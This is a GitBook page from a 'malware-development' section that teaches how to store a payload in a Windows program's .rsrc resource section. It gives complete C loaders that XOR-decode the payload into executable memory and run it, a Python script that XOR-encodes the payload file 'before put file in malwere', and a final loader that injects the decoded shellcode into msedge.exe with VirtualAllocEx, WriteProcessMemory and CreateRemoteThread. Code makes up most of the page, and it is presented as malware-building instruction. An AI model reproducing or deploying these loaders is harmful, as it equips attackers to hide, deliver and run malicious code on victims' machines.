> For the complete documentation index, see [llms.txt](https://everythingblackkk.gitbook.io/everythingblackkk/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://everythingblackkk.gitbook.io/everythingblackkk/malware-development/publish-your-docs.md).

# Rsrc Placement Payload

## 1 - First Version Of Code 

this code Copy Payload From <mark style="color:purple;">**.rsrc**</mark> to TmpBuffer Useing <mark style="color:red;">**"HeapAlloc"**</mark> Addr in Memory&#x20;

```csharp
#include <Windows.h>
#include <stdio.h>
#include "resource.h"

int main() {

    HRSRC   hRsrc        = NULL;
    HGLOBAL hGlobal      = NULL;
    PVOID   pPayloadAddr = NULL;
    SIZE_T  sPayloadSize = NULL;

    hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
    if (hRsrc == NULL) {
        printf("[!] There is a problem in hRsrc: %d\n", GetLastError());
        return -1;
    }

    hGlobal = LoadResource(NULL, hRsrc);
    if (hGlobal == NULL) {
        printf("[!] There is a problem in LoadResource: %d\n", GetLastError());
        return -1;
    }

    pPayloadAddr = LockResource(hGlobal);
    if (pPayloadAddr == NULL) {
        printf("[!] There is a problem in LockResource: %d\n", GetLastError());
        return -1;
    }

    sPayloadSize = SizeofResource(NULL, hRsrc);
    if (sPayloadSize == 0) {
        printf("[!] There is a problem in sPayloadSize: %d\n", GetLastError());
        return -1;
    }

    PVOID TmpBuffer = HeapAlloc(GetProcessHeap(), 0, sPayloadSize);
    if (TmpBuffer == NULL) {
        printf("[!] There is a problem in HeapAlloc: %d\n", GetLastError());
        return -1;
    }

    memcpy(TmpBuffer, pPayloadAddr, sPayloadSize);
    printf("[+] Suc To Move Payload From pPayloadAddr to TmpBuffer\n");

    printf("[+] TmpBuffer Addr : 0x%p\n", TmpBuffer);
    printf("[+] PayloadAddr: 0x%p\n", pPayloadAddr);
    printf("[+] PayloadSize: %d\n", sPayloadSize);

    // Free Mem Heap 
    HeapFree(GetProcessHeap(), 0, TmpBuffer);

    printf("[#] Memory freed successfully.\n");
    printf("[#] Press <Enter> to quit...");
    getchar();

    return 0;
}

```

## 2 - Second Version Of Code

We Can Do SomeThing&#x20;

{% stepper %}
{% step %}

### Xor Shell Code&#x20;

We Can Xor Shell Code instead of Run Shell Code Directly
{% endstep %}

{% step %}

### We Can Use VirtualAlloc Function

This Function To Allocate A memory and Execute it &#x20;
{% endstep %}
{% endstepper %}

this code Copy Payload From <mark style="color:purple;">**.rsrc**</mark> to TmpBuffer Useing <mark style="color:red;">**"VirtualAlloc"**</mark> Addr in Memory And it Can Execute it :)&#x20;

```csharp

#include <Windows.h>
#include <stdio.h>
#include "resource.h"

void DecodeXorEncryption(PBYTE HexArray, SIZE_T HexArraySize, PBYTE Keys, SIZE_T KeysSize) {
    for (int i = 0; i < HexArraySize; i++) {
        HexArray[i] = HexArray[i] ^ Keys[i % KeysSize];
    }
}

int main() {

    unsigned char keys[] = { 0x84, 0x9A, 0x90, 0x8F, 0x90, 0x71, 0x62, 0x72, 0x82, 0x7F, 0x71, 0x2C };

    HRSRC   hRsrc = NULL;
    HGLOBAL hGlobal = NULL;
    PVOID   pPayloadAddr = NULL;
    SIZE_T  sPayloadSize = NULL;

    hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
    if (hRsrc == NULL) {
        printf("[-] Failed to find resource.\n");
        return 1;
    }

    hGlobal = LoadResource(NULL, hRsrc);
    if (hGlobal == NULL) {
        printf("[-] Failed to load resource.\n");
        return 1;
    }

    pPayloadAddr = LockResource(hGlobal);
    if (pPayloadAddr == NULL) {
        printf("[-] Failed to lock resource.\n");
        return 1;
    }

    sPayloadSize = SizeofResource(NULL, hRsrc);
    if (sPayloadSize == 0) {
        printf("[-] Failed to get resource size.\n");
        return 1;
    }

    PVOID execBuffer = VirtualAlloc(NULL, sPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (execBuffer == NULL) {
        printf("[-] Failed to allocate memory for execBuffer.\n");
        return 1;
    }

    memcpy(execBuffer, pPayloadAddr, sPayloadSize);

    DecodeXorEncryption((PBYTE)execBuffer, sPayloadSize, keys, sizeof(keys));

    printf("[+] Data after XOR:\n");
    for (int i = 0; i < sPayloadSize; i++) {
        printf("%02X ", ((unsigned char*)execBuffer)[i]);
    }
    printf("\n");


    printf("[+] execBuffer Addr : 0x%p\n", execBuffer);
    printf("[+] PayloadAddr: 0x%p\n", pPayloadAddr);
    printf("[+] PayloadSize: %zu\n", sPayloadSize);

    printf("[#] Running Payload...\n");
    ((void(*)())execBuffer)();

    VirtualFree(execBuffer, 0, MEM_RELEASE);

    printf("[#] Memory freed successfully.\n");
    printf("[#] Press <Enter> to quit...");
    getchar();

    return 0;
}

```

## Let's Explane the Code :)

#### 1 - Xor Shell Code

```csharp
void DecodeXorEncryption(PBYTE HexArray, SIZE_T HexArraySize, PBYTE Keys, SIZE_T KeysSize) {
    for (int i = 0; i < HexArraySize; i++) {
        HexArray[i] = HexArray[i] ^ Keys[i % KeysSize];
    }
}
```

#### 2- This Is Xor Shell Code with Some Keys :

```
unsigned char keys[] = { 0x84, 0x9A, 0x90, 0x8F, 0x90, 0x71, 0x62, 0x72, 0x82, 0x7F, 0x71, 0x2C };
```

#### 3 - Python Code To Edit Calc.ico File To Xor it Before Put File in Malwere&#x20;

````python
```python
# Define the encryption keys
keys = [0x84, 0x9A, 0x90, 0x8F, 0x90, 0x71, 0x62, 0x72, 0x82, 0x7f, 0x71, 0x2c]

# XOR encryption/decryption function
def xor_with_keys(data, keys):
    return bytes([b ^ keys[i % len(keys)] for i, b in enumerate(data)])

# File path for fav.ico
file_path = "calc.ico"

try:
    # Step 1: Read the binary data from the file
    with open(file_path, "rb") as file:
        original_data = file.read()

    # Step 2: Perform XOR on the data
    xor_data = xor_with_keys(original_data, keys)

    # Step 3: Write the XORed data back to the file
    with open(file_path, "wb") as file:
        file.write(xor_data)

    print(f"Successfully applied XOR and updated {file_path}!")

except FileNotFoundError:
    print(f"Error: {file_path} not found!")
except IOError as e:
    print(f"An I/O error occurred: {e}")

```


````

## Now We Can Add Proc Injection :)

```csharp
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include "resource.h"
#include <string.h>

void DecodeXorEncryption(PBYTE HexArray, SIZE_T HexArraySize, PBYTE Keys, SIZE_T KeysSize) {
    for (int i = 0; i < HexArraySize; i++) {
        HexArray[i] = HexArray[i] ^ Keys[i % KeysSize];
    }
}

PBYTE GetResourceData(SIZE_T* resourceSize) {
    HRSRC hRsrc = NULL;
    HGLOBAL hGlobal = NULL;
    PVOID pPayloadAddr = NULL;

    // Find the resource
    hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
    if (hRsrc == NULL) {
        printf("[-] Failed to find resource.\n");
        return NULL;
    }

    hGlobal = LoadResource(NULL, hRsrc);
    if (hGlobal == NULL) {
        printf("[-] Failed to load resource.\n");
        return NULL;
    }

    pPayloadAddr = LockResource(hGlobal);
    if (pPayloadAddr == NULL) {
        printf("[-] Failed to lock resource.\n");
        return NULL;
    }

    // Get the size of the resource
    *resourceSize = SizeofResource(NULL, hRsrc);
    if (*resourceSize == 0) {
        printf("[-] Failed to get resource size.\n");
        return NULL;
    }

    PBYTE pWritablePayload = (PBYTE)malloc(*resourceSize);
    if (pWritablePayload == NULL) {
        printf("[-] Failed to allocate memory for writable payload.\n");
        return NULL;
    }

    memcpy(pWritablePayload, pPayloadAddr, *resourceSize);
    return pWritablePayload;
}

int FindTarget(const char* ProcName) {
    HANDLE hSnapShot;
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    int pid = 0;

    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, pid);

    if (INVALID_HANDLE_VALUE == hSnapShot) {
        printf("[!] There is a problem in hSnapShot\n");
        return -1;
    }

    if (!Process32First(hSnapShot, &pe32)) {
        printf("[!] There is a problem in Process32First \n");
        CloseHandle(hSnapShot);
        return -1;
    }

    WCHAR wideProcName[MAX_PATH];
    MultiByteToWideChar(CP_UTF8, 0, ProcName, -1, wideProcName, MAX_PATH);

    while (Process32Next(hSnapShot, &pe32)) {
        if (lstrcmpiW(wideProcName, pe32.szExeFile) == 0) {
            pid = pe32.th32ProcessID;
            break;
        }
    }

    CloseHandle(hSnapShot);
    return pid;
}

int main() {
    unsigned char keys[] = { 0x84, 0x9A, 0x90, 0x8F, 0x90, 0x71, 0x62, 0x72, 0x82, 0x7F, 0x71, 0x2C };

    SIZE_T sPayloadSize = 0;
    PBYTE pWritablePayload = GetResourceData(&sPayloadSize);
    if (pWritablePayload == NULL) {
        return 1;
    }

    printf("------------------\n");
    printf("pWritablePayload : %p\n", pWritablePayload);
    printf("------------------\n");


    DecodeXorEncryption(pWritablePayload, sPayloadSize, keys, sizeof(keys));

    printf("[+] Data after XOR:\n");
    for (int i = 0; i < sPayloadSize; i++) {
        printf("%02X ", pWritablePayload[i]);
    }
    printf("\n");

    printf("[+] PayloadAddr: 0x%p\n", pWritablePayload);
    printf("[+] PayloadSize: %zu\n", sPayloadSize);

    printf("[#]--------Start Process Injection--------[#]\n");

    int targetPID = 0;
    targetPID = FindTarget("msedge.exe");
    printf("targetPID : %d\n", targetPID);
    if (targetPID == -1 || targetPID == 0) {
        printf("[-] Failed to find the target process.\n");
        free(pWritablePayload);
        return 1;
    }

    // Open the target process
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
    if (hProcess == NULL) {
        printf("[-] Failed to open the target process. Error: %lu\n", GetLastError());
        free(pWritablePayload);
        return 1;
    }

    // Allocate memory in the target process
    LPVOID remoteBuffer = VirtualAllocEx(hProcess, NULL, sPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (remoteBuffer == NULL) {
        printf("[-] Failed to allocate memory in the target process. Error: %lu\n", GetLastError());
        CloseHandle(hProcess);
        free(pWritablePayload);
        return 1;
    }

    // Write the payload to the target process
    if (!WriteProcessMemory(hProcess, remoteBuffer, pWritablePayload, sPayloadSize, NULL)) {
        printf("[-] Failed to write to the target process memory. Error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        free(pWritablePayload);
        return 1;
    }

    printf("[+] Created remoteBuffer successfully : 0x%p\n", remoteBuffer);

    // Create a remote thread in the target process
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    if (hThread == NULL) {
        printf("[-] Failed to create remote thread in the target process. Error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        free(pWritablePayload);
        return 1;
    }

    printf("[+] Remote thread created successfully.\n");

    // Wait for the remote thread to finish
    WaitForSingleObject(hThread, INFINITE);

    // Clean up
    CloseHandle(hThread);
    VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);
    CloseHandle(hProcess);
    free(pWritablePayload);

    printf("[#] Memory freed successfully.\n");
    printf("[#] Press <Enter> to quit...");
    getchar();

    return 0;
}
```

#### **Why We Used `malloc` First**

1. **Understanding the Resource Memory:**
   * When you load a resource using `LoadResource` and `LockResource`, the data is stored in a **read-only memory section** of your program. This is because resources (like your payload) are typically embedded in the executable file and loaded into memory as part of the program's initialization.
   * Attempting to **modify** this memory (e.g., by applying XOR decryption) will result in an **Access Violation** (`0xC0000005`) because the memory is protected and not writable.
2. **The Problem with Directly Using `pPayloadAddr`:**
   * `pPayloadAddr` points to the memory location of the resource, which is **read-only**.
   * If you try to modify this memory directly (e.g., `DecodeXorEncryption(pPayloadAddr, ...)`), the program will crash because you're trying to write to a protected memory region.
3. **Why `malloc` is Necessary:**
   * `malloc` allocates a **new block of memory** in the **heap**, which is **writable** by default.
   * By copying the resource data (`pPayloadAddr`) into this newly allocated memory (`pWritablePayload`), you create a **writable copy** of the payload.
   * Now, you can safely modify this copy (e.g., apply XOR decryption) without causing an Access Violation.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://everythingblackkk.gitbook.io/everythingblackkk/malware-development/publish-your-docs.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.